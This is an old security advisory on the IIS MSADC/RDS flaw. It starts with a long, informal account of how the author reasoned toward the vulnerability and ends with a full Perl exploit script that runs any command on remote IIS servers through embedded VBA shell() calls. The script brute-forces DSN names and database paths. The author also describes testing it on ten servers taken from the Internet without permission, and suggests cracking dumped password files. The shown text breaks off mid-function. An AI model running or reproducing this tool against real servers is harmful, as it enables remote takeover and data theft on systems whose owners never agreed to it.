Well, that's because it is. At this point, Russ and Greg are have the
keys to IIS servers. I don't know about you, but I'm not liking it. So
I'm getting off my ass and doing something. Besides the fact that this is
all published stuff at this point.
Also, I may be considered 'irresponsible' for posting the exploit.
Now, I would say *maybe* it would be debatable if I had posted *only* the
exploit. But I have posted not only a very long diatribe, but also my
guess of the vulnerability, which includes examples of analysis and
theory. My hopes are to educate people on what the problem is, and how I
went about finding it so that they can perhaps learn how to do it
themselves. Education. It's the key, and that's what I'm trying to do.
No, no vendor education...ADMIN education. USER education. I know I will
probably be futile as a whole in the end, but maybe a few people will
learn something, and that's all that matters to me.
- 3 - *MY* Guess at Greg's RDS Vulnerability
(I say 'guess' because I may not be right. But in any event, I
wouldn't be writing all this unless I found something moderately
interesting ;)
Ok, so Greg's RDS vulnerability has three main aspects:
1. You only need RDSServer.DataFactory component
2. It uses Jet queries with my embedded VBA via pipes trick
3. You don't need userIDs (and therefore no password required),
does *not* require the presence of any sample Web applications
or example code, or even an active database
Now, for those of you who don't know, RDS is basically a way to do
remote data queries to a server. This is done over the web. Basically
your client app communicates via HTTP to the /msadc/msadcs.dll on your
server. The msadcs.dll exposes the RDSServer.DataFactory object, or better
known as the AdvancedDataFactory.
Now AdvancedDataFactory only has four methods, so we're kind of limited
on what we can do. We can CreateRecordSet, Query, SubmitChanges, and
ConvertToString. Query and SubmitChanges require a valid database to work
upon. The other two are just data mangling functions. So there you have
it, that's what we have to work with.
I played with CreateRecordSet and ConvertToString. This actually
relays data from the client, to the server, and back. My hopes was that
somewhere in there I could slip one of my pipe-VBA-shells in there and do
fun stuff. But nope, all they did was regurgitate the data in a different
flavor. Oh well.
SubmitChanges just basically does an elaborate UPDATE/INSERT, where it
just syncs the server's database with the client's recordset. So that
leaves Query.
Well Query lets us run queries against an (existing) database. And we
know we can embed our pipe-VBA-shells in queries, so Query looks good.
But this is nothing spectacular. And there is one catch: the need for an
existing database. We need to pass a DSN to the ActiveDataFactory to
actually run the query on. The problem with the DSN is that:
1. DSNs can require UIDs and passwords
2. There's no way to get a list of available DSNs
(** through RDSServer.DataFactory functions, that
I'm aware of **)
3. I'd say a DSN constitutes an 'active' database
So DSNs blow away point 3 of our known things about Greg's RDS
vulnerability. What if we can get around using DSNs?
Well, we can. See, you can go the easy route by specifying "DSN=rfp",
and then the server keeps all the internal information about that DSN,
including driver, actually database file location (if it's a file-based
driver), UID, password, connection parameters, etc. Well, what's fun is
that we can directly give all that stuff in the query setup instead of a
DSN. Let's say we setup a DSN named 'rfp' (for Rain Forest Puppy or R. F.
Prigogine). We will use these parameters:
DSN name 'rfp'
Microsoft Access (Jet) driver
c:\rfp.mdb for our database
UID will be 'rfp'
password will be 'prigogine'
So by invoking "DSN=rfp", the server knows to use the Access driver on the
c:\rfp.mdb file. DSNs are a nice tight way to precompose all that
information. Or we can do it on the fly. Rather than issuing a "DSN=rfp"
connect string, I can use instead:
"driver={Microsoft Access Driver (*.mdb)}; dbq=c:\rfp.mdb;"
This will still invoke the Access (Jet) driver, and tell it to directly
use c:\rfp.mdb. No UID. No password. No even worrying about if/what
DSNs exist. In the words of Cartman, "Sweet".
That whacks out part of known point #3 (no UID or password). We're
going to use the RDSServer.DataFactory control (known point #1), and we're
going to use the Access driver, with fun pipe-VBA-shell features (known
point #2). We're not using any other web sample scripts, so that cuts out
another portion of known point #3. Oh, we're so close...can you taste it?
(and what does it taste like? chicken?)
There's still one minor detail. Notice we have to specify the 'dbq='
parameter in the connection setup. And this needs to be a valid file. If
it's not, the SQL engine on the server side will fail and return errors
before it even gets around to looking at our queries. But damn, we need
an .mdb file to connect to. Well, if you look in the Access ODBC
reference on Microsoft's website (which sucks, half the links were broken at
various moments through the night while sifting through it...go MS. I
don't blame you though--you probably engineered your site/servers with
Microsoft products, and that explains it right there) you will see that
you can pass a CREATE_DB parameter to the Access driver. This will cause
the driver to construct a valid (empty) .mdb file. Woohoo! (not to
be confused with w00w00; the former is an expression of joy, the latter is
a cool group of guys that I had the fortune of hanging out with at DefCon)
So in our connection setup we pass a "CREATE_DB=c:\rfp.mdb" attribute with
everything else and low and behold, it...... <to be continued...>
----- Some words about my sponsors ---------------------------------------
-- www.technotronic.com Technotronic! Great place!
Run by fellow Wiretrip'er Vacuum, who is also a co-founder of Rhino9
(before Rhino9 'disbanded'; Neon, Horizon, Xaph: come back to the US!),
boasting a slick HTML design recently redone by yours truly (Rain Forest
Puppy/R. F. Prigogine), it's definitely a good site for the latest
security information--especially while PacketStorm is struggling to get
back on its feet (thanks, JP. Now die. What, you're sueing me now?!?)
While you're there, be sure to check out:
* Winfingerprint! -- coded by Vacuum, this tool lets you remotely query a
windows box and see if it's a PDC, BDC, Member
server, SQL server, etc. Also look for the Unix
port of it by me sometime soon (after I finish
all this RDS stuff)
* Horizon's Page! -- that's right. Elite HTML coded by Humble himself.
Problem was he didn't know where to put the shell
code...<a href>? J/K :) The URL is /horizon/
* Newest R9 Tools! -- coming soon. Before 3/4ths of Rhino9 moved to
Germany, there was one last code fest, and some
fun binaries came out of it. Look for them soon!
Technotronic also has the R9 mirror at
rhino9.technotronic.com
-- www.l0pht.com L - zero - p - h - t
Everybody knows L0pht (even senators!) A very active 'independant
security (watchdog) group' who include Dr. Mudge & Dildog (BO2K creator).
While you're there, be sure to check out:
* L0phtcrack! -- one of the best NT password crackers out there! This
will prove highly useful if you use this exploit
do dump the SAM and grab the backup (not that
I encourage hacking...I've done this many times
in LEGIT contracted audits). It's a personal
tool I've standarized on.
* Advisories! -- L0pht releases a very nice variety of advisories, from
Windows DLL problems and Cold Fusion script
problems to Unix race conditions and symlink
vulnerabilities.
* NFR Modules! -- they've teamed up with NFR to be the supplier of many
interesting N-code/NFR modules. They have a nice
selection for your popular network attacks.
** plus I must note that the Palm Pilot stuff, Soapbox, and BBS are pretty
awesome as well!
-- www.houseoffusion.com A great independant Cold Fusion site!
The site of a great friend of mine, Mike Dinowitz, who is my 'go to' man
for all things Cold Fusion and has helped me out immensely with various
Cold Fusion language issues (read: helped me work through some of the
various Cold Fusion exploits that have surfaced). He does offer training
for Cold Fusion...see 'Training Info' under '<Community>'. He co-authored
"Advanced Cold Fusion 4.0 Application Development" and "Cold Fusion Web
Application Construction Kit" vols 2 and 3, and was the founding member of
Team Allaire. Plus, he's an all-around good guy(tm). Also an editor of CF
Advisor, at www.cfadvisor.com.
While you're there, be sure to check out:
* MunchkinLAN! -- a CF based web scanner, which is actually very minimal
code and runs out of an Access db.
* Mike's Mods! -- many modifications to the Cold Fusion Forums scripts,
which include speed/operation improvements.
* CF-Talk! -- Mike is the moderator/owner of the CF-Talk list, which is
a high traffic list discussing Cold Fusion related
development issues, security, etc.
-- Thanks again to all of the above!
-------------------------------------------------------------------------
<continued from above> ...didn't work. Damn. The problem was that it
was passing the CREATE_DB parameter during the SQLDriverConnect() phase,
and that just isn't going to cut it. We need to issue a
SQLConfigDataSource() call (I think that was it...my mind is a mush of
ODBC/SQL/RDS/ADO/OLEDB/FMP API right now) to get CREATE_DB to do it's
thing, and RDSServer.DataFactory.Query just wasn't going to give us love.
So, after struggling with other nuances and ideas, I concluded that I
couldn't make a DSN, or a .mdb from scratch using Access SQL via
RDSServer.DataFactory without connecting to a database/.mdb beforehand.
(**NOTE: if you know how this can be done, EMAIL ME! I WILL TRADE YOU
0DAY! :) rfp@wiretrip.net )
Well damn, so we need a database to make this work. Any 'ol database
will do (hell, even the WINS or DHCP .mdb should work >:). But
unfortunately, none come by default on a standard NT install. Bummer.
But wait....all is not lost....
It seems when you do a 'typical' or better install with Option Pack 4,
a particular .mdb is installed...namely the btcustmr.mdb which is
installed to %systemroot%\help\iis\htm\tutorial\. Microsoft saves the
day! They're just so damn efficient at helping us hack their own
product...
To get IIS 4.0 you practically need to install Option Pack 4, which
will also then install MDAC 1.5--this is good. Let's just hope they
didn't pick the 'minimal' install... The last catch is that we need to
figure out what %systemroot%. On the majority of the systems it will
probably be c:\winnt, d:\winnt, e:\winnt, or f:\winnt (don't laugh, mine
is f:). I guess some wacko might do \win, \windows, \nt, and if you
upgrade it may be \winnt351 or \winnt35. Well, we can do a little 'brute
force' on all those combinations until one works. Oh, and no, you can't
do "dbq=%systemroot%\help\iis\htm\tutorial\btcustmr.mdb"...the SQL driver
pukes.
So that's my guess! Mr. Gonzalez is using a connection string similar to
"driver={Microsoft Access Driver (*.mdb)};
dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;"
with a query that contains one of the pipe-VBA-shell commands. Now, I
think this technically meets all the known points of the exploit--the only
fuzzy one is where Greg mentions "no need of an *active* database". Now,
I may be reading into it, but btcustmr.mdb is hardly active. It's a
totally unused .mdb sitting in a directory most people probably didn't
know existed.
Just to double check, I did a quick little test...and six of the ten
servers I picked off the Internet were susceptible to this method. That'd
a tad better than Greg's 50%, but I had a small population sample, so I'll
give him the benefit of the doubt.
Now, I obviously could be wrong. Maybe Greg found a way to create the
.mdb, or some other way where he doesn't need to rely on the existence of
btcustmr.mdb. I'm not claiming to be a SQL/database wiz--actually, I hate
database applications. Period. They're gross. But I put up with it for
the better good of the Internet. :) But yes, I could be wrong, and I'm
willing to admit it.
Let me also mention the contenders. They were contenders, but
definitely did not make the final round because as much as the 'look' and
'smelled' exploitable, I couldn't get them to crack:
1. Data Shape Provider. This already has hooks into the VBA
interpreter ( you can put VBA commands in the CALC() function--except it
lacks shell()), and is a primary suspect in my eyes. The bonus is that
you do *not* need any database files to use this. Well, barring the fact
that I really don't know what I'm doing, I played around with it trying to
feed some pipe-VBA-shells to it and whatnot, but couldn't get anything
interesting to happen. Now, this is installed by default, has VBA hooks
already, doesn't need a database, etc. I say this fits the description
more that the btcustmr.mdb thing. And it's just all together 'cooler'.
2. Index Server Provider. Now, not all places use Index Server, so I
highly doubted this was the route, but it is a contender. Again, you
don't need a database file, so that's a bonus. I tried the usual
pipe-VBA-shell commands, but no go either.
If I really had to choose, I'd say the exploit was in the Data Shape
Provider (which Microsoft also warned of in the advisory). But since I
couldn't get it to give me love, I went with btcustmr.mdb.
- 4 - Bonus Aspects of My Version of the Exploit
So, yes, I could be wrong. But I figure why not just feature pack this
exploit to *really* kick some ass? Well, so, I wasted a few brains cells
(the things I do for you people...jeez) and thought of some good things to
toss into the code. I figure hey, might as well make this a useful tool!
The first one is pretty obvious. There are many applications on the
market, that would be used on a server, that would make/require a DSN.
For instance Cold Fusion creates a few DSNs, as does iHTML. Some of the
sample apps that come with IIS create DSNs as well, and the MDAC makes a
few too. All these potential DSNs. Remember, it only takes one DSN to
work. So if we wanted to, we could scan to see if any of a number of
default DSNs exist, and if they do, exploit them.
An extension of this would be user created DSNs. Again, all we need is
the DSN name, so we can scan for what are 'psychologically' common DSN
names. For instance test, web, data, database, www, db, and sql are
common type DSN names. Basically, if you supply a dictionary file of DSN
names you want to use, the exploit will sit there and brute force, a la a
remote password cracker on the DSN names.
Of course, we'd need DSNs with the Access Driver. But what's nice
is that if we connect to a valid DSN with an invalid SQL query, we'll get
back the name of the driver in the error message. So it's a nice way to
check.
Then we can also do an inverse type thing--instead of looking for
common DSNs to connect to, we can look for common .mdbs to connect to.
For instance MS Cert Server, DHCP, and WINS all use .mdbs, as well as
particular sample scripts, SDKs, etc. We can just try to connect to them
directly. If we find one, rather than dealing with the table information
within the .mdb, we can just CREATE TABLE on it first, and then exploit
the table we just created. Very simple.
Another interesting feature is dumping the root scope paths from Index
Server. Basically it's a query of "Select paths from scope()". This is
useful because it can provide us with useful directory information...since
one of the tricky problems is determining location of html files and
systemroot (although they're most likely guessable, that's not always the
case). So I tossed this in for kicks, although it doesn't run 'inline'
with the actually exploit checks. You invoke this functionality
separately.
The last extra functionality, but the easiest of them all, is to see if
/scripts/tools/makedsn.exe exists on the webserver. If it does, we can
make a DSN and define the .mdb file to use, and then exploit it right
away. In my particular exploit I make a DSN named 'wicca'. (Greetings to
Simple Nomad! I wish you could have been around at DefCon. Next time.)
So, wow. Lots of ways to get a database connection. My RDS exploit
tries them in the following order, continuing until successful:
- try raw driver connect to btcustmr.mdb
- try to create a DSN with /scripts/tools/makedsn.exe
- look for common DSNs
- look for common .mdbs
- try 'dictionary' attack on user DSNs
And separately you can query Index Server to get the paths information
(Warning: this could be a lot of information! The script automatically
sorts out common directories).
----- Campaign solicitation --------------------------------------------
XOR!! The unofficial AES candidate!
There are many reasons why you should support XOR:
1. It's mad fast!
2. It can be implemented in very little code
3. It will run with decent performance even on the meekest of
Casio watches
4. The ciphertext doesn't look like the plaintext--this is good.
5. Stream, block, chained, unchained, XOR does it all!
6. So many companies already use it as their encryption algo of choice!
So join the 'AES XOR y2k == 8w8' campaign today!
------------------------------------------------------------------------
One interesting feature that's almost necessary is a 'resume' mode.
Imagine you just scanned a webserver, spending the last 5 minutes trying
all the combinations of valid default .mdbs, valid DSNs, etc. Finally it
cracks and you get one, and you run your command. Well, what if you want
to run another command? Do you have to go through that rigmarole again?
Well, not with my script. :) When you make a successful connection, it
writes out a file called 'rds.save'. Then, you can just use the 'resume'
switch (-R), with no other options. It will read in rds.save, and let you
run a command against the successful connection again right away.
Sound good so far? Ok, I'll briefly go through the command line
options.
- 5 - Command Line Options
To run the program, just save this whole advisory to a file, such as
msadc.pl. Then run "perl -x msadc.pl". Perl is smart and will figure out
how to run the exploit at the end. No need to cut and paste. :)
Ok, the command switches are as follows:
-h <ip or domain> this is the host to scan. You MUST either
use either -h or -R.
-d <value 0-?> this is the delay between connections.
Value is in number of seconds. I added
this because hammering the RDS components
caused the server to occasionally stop
responding :) Defaults to 1. Use -d 0
to disable.
-v verbose. This will print the ODBC error
information. Really only for
troubleshooting purposes.
-e external dictionary file to use on step
5--the 'DSN dictionary guess' stage. The
file should just be plaintext, one DSN
name per line file with all the DSN names
you want to try. Quite honestly a normal
dictionary file won't do you much good.
You can probably do pretty damn well with
a few dozen or two good ones, like 'www',
'data', 'database', 'sql', etc.
-R resume. You can still specify -v or -d
with -R. This will cause the script to
read in rds.save and execute the command
on the last valid connection.
-X perform an Index Server table dump instead.
None of the other switches really apply
here, other than -v (although -d still
works, there's no need to slow down one
query). This dumps the root paths from
Index Server, which can be rather lengthy.
I suggest you pipe the output into a file.
Also, if there is a lot of return
information, this command may take a while
to complete. Be patient. And I don't
suggest you use this command more than
once a minute...it caused my P200 w/
128 RAM to stop answering requests, and
in general borked inetinfo.exe. If you do
decide to CONTROL-C during the middle of the
data download the script will save all
received data into a file called 'raw.out',
so you don't loose everything you've
already received. NOTE: this is the raw
data, which is in Unicode.
- 6 - Random Q & A
- "This or that function of the script is broken"
-- Well, it wasn't broken when I used it, so you must of broke it.
No, seriously. I've tested it on Linux, L0pht tested it on
Solaris, and Vacuum tested it on NT (using Perl 5.005-03 for
Windows). They worked for us. I've coded some various checks
for errors, but nothing robust. But I know it worked for me. :)
- "Why don't you code this in C?"
-- Because I've been programming C/C++ for 8 years. I'm tired of it.
I've been coding perl for 3, so it's new and fresh, and I'm just
now starting to do interesting stuff. Plus the code is portable
this way. Come on, where else can you have a piece of code that
does network/socket level stuff that runs on NT, Linux, and Solaris
with no changes??!?
- "Or you going to port this to C?"
-- It wouldn't be that hard at all, but wasn't planning on it. You have
something against perl?
- "What's the F in Russell F. Prigogine stand for?"
-- Fabio. Fear the geese.
- "Why do you act like this is a joke?"
-- Because I don't get paid for doing this, I don't get donations, and I
don't get any sexual gratification from this what-so-ever. I
do this because I *like* to, because it's *FUN*--so damn it,
I'm having fun!
- "I don't get some of the jokes in the paper. Like what's FMP?"
-- If you have to ask, you wouldn't understand. This advisory is
teeming with inside jokes. RFP, FMP.
- 7 - Signoff
Ok, I've been coding the exploit, reading MS database propaganda (did I
mention yet I hate database stuff?), and writing this damn advisory for a
collective of 30 hours. About time I stop and never think about it again.
:)
So you have my best shot at the RDS exploit, even though I think there may
be something pretty nifty hiding in the Data Shape Provider (or maybe
Index Server). We'll just have to wait and see if/when Greg and Russ
finally decide they can share their toys.
Remember, I spent 2 days typing all this in an attempt to teach people
something, rather than to just release the vanilla exploit. So if you
want to label me irresponsible, well, I suppose I could have been more so.
Moreover, I support eEye in what they did 100%. Russ says "there are
numerous unwritten rules when it comes to security disclosures". Rules?
Unwritten? Well, maybe eEye was unaware of these rules, since they're not
written down.
Future updates to this advisory and exploit code will be posted to
www.technotronic.com/rfp/
Well, it's been fun. Until the next release (which may be sooner than
you think ;)
- rain forest puppy / R. F. Prigogine -
- ADM / Wiretrip -
- rfp@wiretrip.net -
*** SPECIAL THANKS once again to Mudge and Weld from
www.l0pht.com for helping me out on the preliminary
assessment, and Mike Dinowitz from www.houseoffusion.com
and Vacuum from www.technotronic.com for creative input.
Time is creation. The future is just not there.
- 8 - The Code!!!!
Again, to run this, save this advisory to a file (for instance
msadc.txt) and then run 'perl -x file' (ie perl -x msadc.txt).
#!perl
#
# MSADC/RDS 'usage' (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!
use Socket; use Getopt::Std;
getopts("e:vd:h:XR", \%args);
print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-v = verbose
-e = external dictionary file for step 5
Or a -R will resume a command session
~; exit;}
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }
if (!defined $args{R}){ $ret = &has_msadc;
die("Looks like msadcs.dll doesn't exist\n")if $ret==0}
print "Please type the NT commandline you want to run (cmd /c assumed):\n"
. "cmd /c ";
$in=<STDIN>; chomp $in;
$command="cmd /c " . $in ;
if (defined $args{R}) {&load; exit;}
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;
print "\nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>\n" : print "<<fail>>\n";
print "\nStep 3: Trying known DSNs...";
&known_dsn;
print "\nStep 4: Trying known .mdbs...";
&known_mdb;
if (defined $args{e}){
print "\nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 5 skipped.\n\n"; }
print "Sorry Charley...maybe next time?\n";
exit;
##############################################################################
sub sendraw { # ripped and modded from whisker
sleep($delay); # it's a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub make_header { # make the HTTP request
my $msadc=<<EOT
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
; $msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City=" . make_shell();
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C=" . make_shell();
$dsn="$p1";}
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}
elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
$req = "\x02\x00\x03\x00";
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}
##############################################################################
sub make_shell { # this makes the shell() statement
return "'|shell(\"$command\")|'";}
##############################################################################
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
##############################################################################
sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn { # this makes a DSN for us
my @drives=("c","d","e","f");
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
##############################################################################
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
##############################################################################
sub try_btcustmr {
my @drives=("c","d","e","f");
my @dirs=("winnt","winnt35","winnt351","win","windows");
foreach $dir (@dirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
##############################################################################
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
##############################################################################
sub save {
my ($p1, $p2, $p3, $p4)=@_;
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
close OUT;}
##############################################################################
sub load {
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
$ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
$p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g;
if($p[1]==1) {
$reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
if (rdo_success(@results)){print "Success!\n";}
else { print "failed\n"; verbose(odbc_error(@results));}}
elsif ($p[1]==3){
if(run_query("$p[3]")){
print "Success!\n";} else { print "failed\n"; }}
elsif ($p[1]==4){
if(run_query($drvst . "$p[3]")){
print "Success!\n"; } else { print "failed\n"; }}
exit;}
##############################################################################
sub create_table {
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
##############################################################################
sub known_dsn {
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successful\n";
if(run_query("DSN=$dSn")){
print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something's borked. Use verbose next time\n";}}} print "\n";}
##############################################################################
sub is_access {
my ($in)=@_;
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query {
my ($in)=@_;
$reqlen=length( make_req(3,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
# this is sparse, because I don't know of many
my @sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
foreach $drive (@drives) {
foreach $dir (@dirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}}
foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv . $drive . $dir . $mdb)){
print "\n" . $drive . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}
}
##############################################################################
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server doesn't seem to be installed.\n"; }}
##############################################################################
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successful\n";
if(run_query("DSN=$dSn")){
print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something's borked. Use verbose next time\n";}}}
print "\n"; close(IN);}
##############################################################################
sub sendraw2 { # ripped and modded from whisker
sleep($delay); # it's a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
